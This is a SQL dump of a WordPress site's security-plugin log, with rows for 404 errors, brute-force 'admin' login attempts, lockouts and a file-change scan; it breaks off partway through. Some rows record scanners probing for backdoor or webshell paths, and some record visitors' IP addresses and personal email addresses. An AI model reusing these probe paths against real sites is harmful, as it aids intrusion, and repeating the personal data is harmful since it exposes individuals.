(86194, 'four_oh_four', '404 Error', 3, '2018-04-27 23:25:00', '2018-04-28 04:25:00', '104.220.105.69', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86195, 'four_oh_four', '404 Error', 3, '2018-04-28 01:23:27', '2018-04-28 06:23:27', '107.158.178.12', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(86196, 'four_oh_four', '404 Error', 3, '2018-04-28 01:23:28', '2018-04-28 06:23:28', '107.158.178.12', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86197, 'four_oh_four', '404 Error', 3, '2018-04-28 01:28:32', '2018-04-28 06:28:32', '66.249.69.99', '', 0, '/rapid-methods-for-spy-phone-app-for-2016/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86198, 'four_oh_four', '404 Error', 3, '2018-04-28 02:27:32', '2018-04-28 07:27:32', '45.117.156.117', '', 0, '/', 'http://clearyourbeliefs.com/', 'a:1:{s:12:"query_string";s:6:"p=2474";}'),
(86199, 'four_oh_four', '404 Error', 3, '2018-04-28 02:39:15', '2018-04-28 07:39:15', '100.43.85.173', '', 0, '/blog/page/81/href', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86200, 'four_oh_four', '404 Error', 3, '2018-04-28 03:35:24', '2018-04-28 08:35:24', '185.85.238.244', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86201, 'four_oh_four', '404 Error', 3, '2018-04-28 03:57:48', '2018-04-28 08:57:48', '115.73.14.213', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(86202, 'four_oh_four', '404 Error', 3, '2018-04-28 03:57:52', '2018-04-28 08:57:52', '115.73.14.213', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86203, 'four_oh_four', '404 Error', 3, '2018-04-28 04:13:21', '2018-04-28 09:13:21', '23.94.31.250', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(86204, 'four_oh_four', '404 Error', 3, '2018-04-28 04:13:22', '2018-04-28 09:13:22', '23.94.31.250', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86205, 'four_oh_four', '404 Error', 3, '2018-04-28 04:20:23', '2018-04-28 09:20:23', '185.86.164.108', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86206, 'four_oh_four', '404 Error', 3, '2018-04-28 04:50:11', '2018-04-28 09:50:11', '14.162.143.121', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(86207, 'four_oh_four', '404 Error', 3, '2018-04-28 04:50:12', '2018-04-28 09:50:12', '14.162.143.121', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86208, 'four_oh_four', '404 Error', 3, '2018-04-28 04:54:10', '2018-04-28 09:54:10', '115.188.126.48', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86209, 'four_oh_four', '404 Error', 3, '2018-04-28 05:18:56', '2018-04-28 10:18:56', '157.55.39.235', '', 0, '/liongoodman-com/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86210, 'four_oh_four', '404 Error', 3, '2018-04-28 05:20:46', '2018-04-28 10:20:46', '185.86.164.101', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86211, 'four_oh_four', '404 Error', 3, '2018-04-28 05:48:50', '2018-04-28 10:48:50', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86212, 'four_oh_four', '404 Error', 3, '2018-04-28 05:48:51', '2018-04-28 10:48:51', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86213, 'four_oh_four', '404 Error', 3, '2018-04-28 05:48:53', '2018-04-28 10:48:53', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86214, 'four_oh_four', '404 Error', 3, '2018-04-28 05:48:54', '2018-04-28 10:48:54', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86215, 'four_oh_four', '404 Error', 3, '2018-04-28 05:56:03', '2018-04-28 10:56:03', '185.86.164.106', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86216, 'four_oh_four', '404 Error', 3, '2018-04-28 06:19:08', '2018-04-28 11:19:08', '192.227.247.209', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(86217, 'four_oh_four', '404 Error', 3, '2018-04-28 06:19:09', '2018-04-28 11:19:09', '192.227.247.209', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86218, 'four_oh_four', '404 Error', 3, '2018-04-28 07:01:52', '2018-04-28 12:01:52', '185.86.13.213', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86219, 'four_oh_four', '404 Error', 3, '2018-04-28 07:16:49', '2018-04-28 12:16:49', '64.62.252.169', '', 0, '/who-we-are/mariajgarcia@verizon.net', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86220, 'four_oh_four', '404 Error', 3, '2018-04-28 07:17:40', '2018-04-28 12:17:40', '64.62.252.169', '', 0, '/who-we-are/www.ThrivingBusinessPartners.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86221, 'four_oh_four', '404 Error', 3, '2018-04-28 07:18:32', '2018-04-28 12:18:32', '64.62.252.169', '', 0, '/who-we-are/www.Vital-Ventures.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86222, 'four_oh_four', '404 Error', 3, '2018-04-28 07:19:20', '2018-04-28 12:19:20', '64.62.252.169', '', 0, '/who-we-are/howard@breakthroughcoaching.cc', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86223, 'four_oh_four', '404 Error', 3, '2018-04-28 07:19:38', '2018-04-28 12:19:38', '64.62.252.169', '', 0, '/who-we-are/www.breakthroughcoaching.cc', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86224, 'four_oh_four', '404 Error', 3, '2018-04-28 07:20:58', '2018-04-28 12:20:58', '64.62.252.169', '', 0, '/who-we-are/www.yoursedonacoach.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86225, 'four_oh_four', '404 Error', 3, '2018-04-28 07:21:33', '2018-04-28 12:21:33', '64.62.252.169', '', 0, '/who-we-are/www.RadiantClarity.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86226, 'four_oh_four', '404 Error', 3, '2018-04-28 07:46:36', '2018-04-28 12:46:36', '185.86.164.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86227, 'four_oh_four', '404 Error', 3, '2018-04-28 08:01:16', '2018-04-28 13:01:16', '157.55.39.182', '', 0, '/is-getting-out-of-hand-the-pontiac-g6-when-i-first-came-in/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86228, 'four_oh_four', '404 Error', 3, '2018-04-28 08:08:38', '2018-04-28 13:08:38', '185.86.164.100', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86229, 'four_oh_four', '404 Error', 3, '2018-04-28 08:23:23', '2018-04-28 13:23:23', '103.99.0.218', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(86230, 'four_oh_four', '404 Error', 3, '2018-04-28 08:23:24', '2018-04-28 13:23:24', '103.99.0.218', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(86231, 'four_oh_four', '404 Error', 3, '2018-04-28 08:37:07', '2018-04-28 13:37:07', '185.86.13.213', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86232, 'four_oh_four', '404 Error', 3, '2018-04-28 08:38:03', '2018-04-28 13:38:03', '185.86.164.108', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86233, 'four_oh_four', '404 Error', 3, '2018-04-28 08:46:48', '2018-04-28 13:46:48', '185.86.164.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86234, 'four_oh_four', '404 Error', 3, '2018-04-28 08:51:22', '2018-04-28 13:51:22', '185.86.164.106', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86235, 'four_oh_four', '404 Error', 3, '2018-04-28 09:04:05', '2018-04-28 14:04:05', '185.119.81.11', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86236, 'four_oh_four', '404 Error', 3, '2018-04-28 09:34:58', '2018-04-28 14:34:58', '185.85.191.201', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86237, 'four_oh_four', '404 Error', 3, '2018-04-28 09:41:25', '2018-04-28 14:41:25', '185.86.164.107', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86238, 'four_oh_four', '404 Error', 3, '2018-04-28 09:46:06', '2018-04-28 14:46:06', '185.85.191.201', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86239, 'four_oh_four', '404 Error', 3, '2018-04-28 09:47:17', '2018-04-28 14:47:17', '185.86.167.4', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86240, 'four_oh_four', '404 Error', 3, '2018-04-28 09:50:18', '2018-04-28 14:50:18', '185.86.164.100', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86241, 'four_oh_four', '404 Error', 3, '2018-04-28 09:54:43', '2018-04-28 14:54:43', '111.206.221.18', '', 0, '/wp-content/plugins/ready-ecommerce/templates/standard/img/tb-close.png', 'http://clearyourbeliefs.com/wp-content/plugins/ready-ecommerce/templates/standard/subScreen.css?ver=4.8.6', 'a:1:{s:12:"query_string";s:0:"";}'),
(86242, 'four_oh_four', '404 Error', 3, '2018-04-28 10:17:36', '2018-04-28 15:17:36', '105.226.144.184', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86243, 'four_oh_four', '404 Error', 3, '2018-04-28 10:22:58', '2018-04-28 15:22:58', '185.206.224.110', '', 0, '/http:/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86244, 'four_oh_four', '404 Error', 3, '2018-04-28 10:45:20', '2018-04-28 15:45:20', '185.86.164.101', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86245, 'four_oh_four', '404 Error', 3, '2018-04-28 11:14:06', '2018-04-28 16:14:06', '41.237.255.198', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86246, 'four_oh_four', '404 Error', 3, '2018-04-28 11:18:50', '2018-04-28 16:18:50', '185.86.164.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86247, 'four_oh_four', '404 Error', 3, '2018-04-28 11:23:47', '2018-04-28 16:23:47', '142.44.159.96', '', 0, '/author/susan/www.yoursedonacoach.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86248, 'four_oh_four', '404 Error', 3, '2018-04-28 11:44:19', '2018-04-28 16:44:19', '185.85.238.244', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86249, 'four_oh_four', '404 Error', 3, '2018-04-28 11:47:57', '2018-04-28 16:47:57', '88.236.184.35', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86250, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-28 12:27:40', '2018-04-28 17:27:40', '62.102.148.67', 'admin', 0, '', '', 'a:0:{}'),
(86251, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-28 12:27:40', '2018-04-28 17:27:40', '62.102.148.67', 'admin', 0, '', '', 'a:0:{}'),
(86252, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-28 12:27:40', '2018-04-28 17:27:40', '62.102.148.67', 'admin', 0, '', '', 'a:0:{}'),
(86253, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-28 12:27:40', '2018-04-28 17:27:40', '62.102.148.67', 'admin', 0, '', '', 'a:0:{}'),
(86254, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-28 12:27:40', '2018-04-28 17:27:40', '62.102.148.67', 'admin', 0, '', '', 'a:0:{}'),
(86255, 'lockout', 'Host or User Lockout', 10, '2018-04-28 12:27:40', '2018-04-28 17:27:40', '62.102.148.67', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-04-28 12:42:40";s:11:"expires_gmt";s:19:"2018-04-28 17:42:40";s:4:"type";s:11:"brute_force";}'),
(86256, 'four_oh_four', '404 Error', 3, '2018-04-28 12:56:18', '2018-04-28 17:56:18', '1.187.213.58', '', 0, '/wp-content/plugins/ready-ecommerce/templates/standard/img/tb-close.png', 'http://clearyourbeliefs.com/wp-content/plugins/ready-ecommerce/templates/standard/subScreen.css?ver=4.8.6', 'a:1:{s:12:"query_string";s:0:"";}'),
(86257, 'four_oh_four', '404 Error', 3, '2018-04-28 13:19:01', '2018-04-28 18:19:01', '185.85.239.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86258, 'four_oh_four', '404 Error', 3, '2018-04-28 13:20:54', '2018-04-28 18:20:54', '185.86.164.98', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86259, 'four_oh_four', '404 Error', 3, '2018-04-28 13:21:49', '2018-04-28 18:21:49', '185.86.167.4', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86260, 'four_oh_four', '404 Error', 3, '2018-04-28 13:35:12', '2018-04-28 18:35:12', '185.85.239.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86261, 'four_oh_four', '404 Error', 3, '2018-04-28 13:39:59', '2018-04-28 18:39:59', '185.86.164.106', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86262, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-28 13:41:20', '2018-04-28 18:41:20', '199.195.250.77', 'admin', 0, '', '', 'a:0:{}'),
(86263, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-28 13:41:20', '2018-04-28 18:41:20', '199.195.250.77', 'admin', 0, '', '', 'a:0:{}'),
(86264, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-28 13:41:20', '2018-04-28 18:41:20', '199.195.250.77', 'admin', 0, '', '', 'a:0:{}'),
(86265, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-28 13:41:20', '2018-04-28 18:41:20', '199.195.250.77', 'admin', 0, '', '', 'a:0:{}'),
(86266, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-28 13:41:20', '2018-04-28 18:41:20', '199.195.250.77', 'admin', 0, '', '', 'a:0:{}'),
(86267, 'lockout', 'Host or User Lockout', 10, '2018-04-28 13:41:20', '2018-04-28 18:41:20', '199.195.250.77', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-04-28 13:56:20";s:11:"expires_gmt";s:19:"2018-04-28 18:56:20";s:4:"type";s:11:"brute_force";}'),
(86268, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-28 13:50:04', '2018-04-28 18:50:04', '77.247.181.165', 'admin', 0, '', '', 'a:0:{}'),
(86269, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-28 13:50:04', '2018-04-28 18:50:04', '77.247.181.165', 'admin', 0, '', '', 'a:0:{}'),
(86270, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-28 13:50:04', '2018-04-28 18:50:04', '77.247.181.165', 'admin', 0, '', '', 'a:0:{}'),
(86271, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-28 13:50:04', '2018-04-28 18:50:04', '77.247.181.165', 'admin', 0, '', '', 'a:0:{}'),
(86272, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-28 13:50:04', '2018-04-28 18:50:04', '77.247.181.165', 'admin', 0, '', '', 'a:0:{}'),
(86273, 'lockout', 'Host or User Lockout', 10, '2018-04-28 13:50:04', '2018-04-28 18:50:04', '77.247.181.165', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-04-28 14:05:04";s:11:"expires_gmt";s:19:"2018-04-28 19:05:04";s:4:"type";s:11:"brute_force";}'),
(86274, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-28 13:52:00', '2018-04-28 18:52:00', '46.101.161.246', 'admin', 0, '', '', 'a:0:{}'),
(86275, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-28 13:52:00', '2018-04-28 18:52:00', '46.101.161.246', 'admin', 0, '', '', 'a:0:{}'),
(86276, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-28 13:52:00', '2018-04-28 18:52:00', '46.101.161.246', 'admin', 0, '', '', 'a:0:{}'),
(86277, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-28 13:52:00', '2018-04-28 18:52:00', '46.101.161.246', 'admin', 0, '', '', 'a:0:{}'),
(86278, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-28 13:52:00', '2018-04-28 18:52:00', '46.101.161.246', 'admin', 0, '', '', 'a:0:{}'),
(86279, 'lockout', 'Host or User Lockout', 10, '2018-04-28 13:52:00', '2018-04-28 18:52:00', '46.101.161.246', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-04-28 14:07:00";s:11:"expires_gmt";s:19:"2018-04-28 19:07:00";s:4:"type";s:11:"brute_force";}'),
(86280, 'four_oh_four', '404 Error', 3, '2018-04-28 14:01:29', '2018-04-28 19:01:29', '185.86.164.108', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86281, 'four_oh_four', '404 Error', 3, '2018-04-28 14:13:30', '2018-04-28 19:13:30', '185.86.167.4', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86282, 'four_oh_four', '404 Error', 3, '2018-04-28 14:18:50', '2018-04-28 19:18:50', '185.86.164.106', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86283, 'four_oh_four', '404 Error', 3, '2018-04-28 14:44:44', '2018-04-28 19:44:44', '185.119.81.50', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86284, 'four_oh_four', '404 Error', 3, '2018-04-28 15:19:33', '2018-04-28 20:19:33', '185.220.101.20', '', 0, '/wp-content/plugins/fac/js.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86285, 'four_oh_four', '404 Error', 3, '2018-04-28 15:19:37', '2018-04-28 20:19:37', '185.220.101.20', '', 0, '/wp-content/plugins/wp-zipy/yusa.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86286, 'four_oh_four', '404 Error', 3, '2018-04-28 15:19:42', '2018-04-28 20:19:42', '185.220.101.20', '', 0, '/wp-content/themes/classic/.helper.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86287, 'four_oh_four', '404 Error', 3, '2018-04-28 15:19:46', '2018-04-28 20:19:46', '185.220.101.20', '', 0, '/wp-content/plugins/wp-zipy/t.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86288, 'four_oh_four', '404 Error', 3, '2018-04-28 15:19:51', '2018-04-28 20:19:51', '185.220.101.20', '', 0, '/cgi.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86289, 'four_oh_four', '404 Error', 3, '2018-04-28 15:19:53', '2018-04-28 20:19:53', '185.220.101.20', '', 0, '/wp-content/plugins/gxp/q.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86290, 'four_oh_four', '404 Error', 3, '2018-04-28 15:19:58', '2018-04-28 20:19:58', '185.220.101.20', '', 0, '/s.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86291, 'four_oh_four', '404 Error', 3, '2018-04-28 15:19:59', '2018-04-28 20:19:59', '185.220.101.20', '', 0, '/x.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86292, 'four_oh_four', '404 Error', 3, '2018-04-28 15:20:02', '2018-04-28 20:20:02', '185.220.101.20', '', 0, '/wp-content/plugins/azigen/.svn.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86293, 'four_oh_four', '404 Error', 3, '2018-04-28 15:20:09', '2018-04-28 20:20:09', '176.126.252.11', '', 0, '/tyre.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86294, 'four_oh_four', '404 Error', 3, '2018-04-28 15:20:10', '2018-04-28 20:20:10', '176.126.252.11', '', 0, '/.-a8.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86295, 'four_oh_four', '404 Error', 3, '2018-04-28 15:20:12', '2018-04-28 20:20:12', '176.126.252.11', '', 0, '/Meuhy.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86296, 'four_oh_four', '404 Error', 3, '2018-04-28 15:20:14', '2018-04-28 20:20:14', '176.126.252.11', '', 0, '/system-cli.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86297, 'four_oh_four', '404 Error', 3, '2018-04-28 15:20:16', '2018-04-28 20:20:16', '176.126.252.11', '', 0, '/wp-blog-posts.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86298, 'four_oh_four', '404 Error', 3, '2018-04-28 15:20:18', '2018-04-28 20:20:18', '176.126.252.11', '', 0, '/kadI.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86299, 'four_oh_four', '404 Error', 3, '2018-04-28 15:20:25', '2018-04-28 20:20:25', '176.126.252.11', '', 0, '/wp-content/plugins/iSEO/up.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86300, 'four_oh_four', '404 Error', 3, '2018-04-28 15:20:27', '2018-04-28 20:20:27', '176.126.252.11', '', 0, '/include.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86301, 'four_oh_four', '404 Error', 3, '2018-04-28 15:20:35', '2018-04-28 20:20:35', '176.126.252.11', '', 0, '/wp-content/themes/index2.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86302, 'four_oh_four', '404 Error', 3, '2018-04-28 15:28:54', '2018-04-28 20:28:54', '185.86.164.107', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86303, 'four_oh_four', '404 Error', 3, '2018-04-28 15:34:58', '2018-04-28 20:34:58', '185.119.81.11', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86304, 'four_oh_four', '404 Error', 3, '2018-04-28 16:07:36', '2018-04-28 21:07:36', '185.85.239.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86798, 'four_oh_four', '404 Error', 3, '2018-05-01 16:51:21', '2018-05-01 21:51:21', '213.89.179.20', '', 0, '/wp-content/plugins/ready-ecommerce/templates/standard/img/tb-close.png', 'http://clearyourbeliefs.com/', 'a:1:{s:12:"query_string";s:0:"";}'),
(84806, 'file_change', 'File Changes Detected', 8, '2018-04-18 16:37:15', '2018-04-18 21:37:15', '', '', 0, '', '', 'a:4:{s:5:"added";a:62:{s:75:"wp-content/plugins/search-and-replace/assets/css/inpsyde-search-replace.css";a:2:{s:1:"d";s:10:"1524010275";s:1:"h";s:32:"95d3f0670f9e31fd8d01b4f46410ac80";}s:79:"wp-content/plugins/search-and-replace/assets/css/inpsyde-search-replace.min.css";a:2:{s:1:"d";s:10:"1524010275";s:1:"h";s:32:"b80c8784d385fb5591905451e1d8847c";}s:73:"wp-content/plugins/search-and-replace/assets/js/inpsyde-search-replace.js";a:2:{s:1:"d";s:10:"1524010275";s:1:"h";s:32:"38602b5c1fcddd97cd1c283049504ddc";}s:77:"wp-content/plugins/search-and-replace/assets/js/inpsyde-search-replace.min.js";a:2:{s:1:"d";s:10:"1524010275";s:1:"h";s:32:"81406d2bc872435a44b0047d209ac359";}s:63:"wp-content/plugins/search-and-replace/inc/Database/Exporter.php";a:2:{s:1:"d";s:10:"1524010275";s:1:"h";s:32:"857500eaed0862ec38e08bfcb0eb5bf3";}s:63:"wp-content/plugins/search-and-replace/inc/Database/Importer.php";a:2:{s:1:"d";s:10:"1524010275";s:1:"h";s:32:"8c738fcf3799ca479d595522b803ec10";}s:62:"wp-content/plugins/search-and-replace/inc/Database/Manager.php";a:2:{s:1:"d";s:10:"1524010275";s:1:"h";s:32:"cf49598d11bcd3c2307d45485dc244c5";}s:62:"wp-content/plugins/search-and-replace/inc/Database/Replace.php";a:2:{s:1:"d";s:10:"1524010275";s:1:"h";s:32:"5650392f78a9148a81da533ae4dcd5ed";}s:63:"wp-content/plugins/search-and-replace/inc/Page/AbstractPage.php";a:2:{s:1:"d";s:10:"1524010275";s:1:"h";s:32:"c6a3cec07a760a8a6b3c6dd70c9a1680";}s:65:"wp-content/plugins/search-and-replace/inc/Page/BackupDatabase.php";a:2:{s:1:"d";s:10:"1524010275";s:1:"h";s:32:"844011182eeba26232e4630a2c9d982d";}s:58:"wp-content/plugins/search-and-replace/inc/Page/Credits.php";a:2:{s:1:"d";s:10:"1524010275";s:1:"h";s:32:"b51e6e76da466bc61d48eb5699a74f84";}s:58:"wp-content/plugins/search-and-replace/inc/Page/Manager.php";a:2:{s:1:"d";s:10:"1524010275";s:1:"h";s:32:"ab9ea404317ade519791c033788fb5a5";}s:64:"wp-content/plugins/search-and-replace/inc/Page/PageInterface.php";a:2:{s:1:"d";s:10:"1524010275";s:1:"h";s:32:"bec96fc58acc76c482c6a545865a584e";}s:64:"wp-content/plugins/search-and-replace/inc/Page/ReplaceDomain.php";a:2:{s:1:"d";s:10:"1524010275";s:1:"h";s:32:"ffd957391697c3352a0eef1b5f4fded8";}s:64:"wp-content/plugins/search-and-replace/inc/Page/SearchReplace.php";a:2:{s:1:"d";s:10:"1524010275";s:1:"h";s:32:"e9106712a87a5ed84f46220047335e07";}s:60:"wp-content/plugins/search-and-replace/inc/Page/SqlImport.php";a:2:{s:1:"d";s:10:"1524010275";s:1:"h";s:32:"eb849f24534f8fd366ffcfdda871cbeb";}s:70:"wp-content/plugins/search-and-replace/inc/Service/MaxExecutionTime.php";a:2:{s:1:"d";s:10:"1524010275";s:1:"h";s:32:"040ff85e4f4240180fda01fca7f1c20a";}s:105:"wp-content/plugins/search-and-replace/inc/requisite/src/Requisite/Loader/DefaultConditionalFileLoader.php";a:2:{s:1:"d";s:10:"1524010275";s:1:"h";s:32:"a346f1e49c974c767362bf947985d7f5";}s:101:"wp-content/plugins/search-and-replace/inc/requisite/src/Requisite/Loader/DirectoryCacheFileLoader.php";a:2:{s:1:"d";s:10:"1524010275";s:1:"h";s:32:"d152e61756b9112965eae1593dff6787";}s:96:"wp-content/plugins/search-and-replace/inc/requisite/src/Requisite/Loader/FileLoaderInterface.php";a:2:{s:1:"d";s:10:"1524010275";s:1:"h";s:32:"5f8bea941b0198c8ebae6a125c62c2f0";}s:96:"wp-content/plugins/search-and-replace/inc/requisite/src/Requisite/Rule/AutoLoadRuleInterface.php";a:2:{s:1:"d";s:10:"1524010275";s:1:"h";s:32:"f64f1d004622d06ee8c95a4babc4b5f2";}s:99:"wp-content/plugins/search-and-replace/inc/requisite/src/Requisite/Rule/NamespaceDirectoryMapper.php";a:2:{s:1:"d";s:10:"1524010275";s:1:"h";s:32:"60368953b595b94d913400d845467050";}s:79:"wp-content/plugins/search-and-replace/inc/requisite/src/Requisite/Rule/Psr4.php";a:2:{s:1:"d";s:10:"1524010275";s:1:"h";s:32:"8b3001fd1c906b6c71fe931544f554f8";}s:89:"wp-content/plugins/search-and-replace/inc/requisite/src/Requisite/AutoLoaderInterface.php";a:2:{s:1:"d";s:10:"1524010275";s:1:"h";s:32:"528f468ec466e09d282200d59f6150b9";}s:79:"wp-content/plugins/search-and-replace/inc/requisite/src/Requisite/Requisite.php";a:2:{s:1:"d";s:10:"1524010275";s:1:"h";s:32:"60a694670e437d9b54edf44598b516bc";}s:83:"wp-content/plugins/search-and-replace/inc/requisite/src/Requisite/SPLAutoLoader.php";a:2:{s:1:"d";s:10:"1524010275";s:1:"h";s:32:"16ed6964705a820074aed83d9a3bc9cd";}s:63:"wp-content/plugins/search-and-replace/inc/templates/credits.php";a:2:{s:1:"d";s:10:"1524010275";s:1:"h";s:32:"f603debbe7ed4293b410829b70d52e39";}s:65:"wp-content/plugins/search-and-replace/inc/templates/db_backup.php";a:2:{s:1:"d";s:10:"1524010275";s:1:"h";s:32:"acc3215710273bc6bc37920d6223ca16";}s:70:"wp-content/plugins/search-and-replace/inc/templates/replace_domain.php";a:2:{s:1:"d";s:10:"1524010275";s:1:"h";s:32:"04cca64f70f05347930e24633b06a5f0";}s:70:"wp-content/plugins/search-and-replace/inc/templates/search_replace.php";a:2:{s:1:"d";s:10:"1524010275";s:1:"h";s:32:"e8f9e69e4acaf749d59b7e1f05918664";}s:66:"wp-content/plugins/search-and-replace/inc/templates/sql_import.php";a:2:{s:1:"d";s:10:"1524010275";s:1:"h";s:32:"72c3b8474aeebb57ee426eae842aee34";}s:60:"wp-content/plugins/search-and-replace/inc/FileDownloader.php";a:2:{s:1:"d";s:10:"1524010275";s:1:"h";s:32:"58f088e8c64c2436853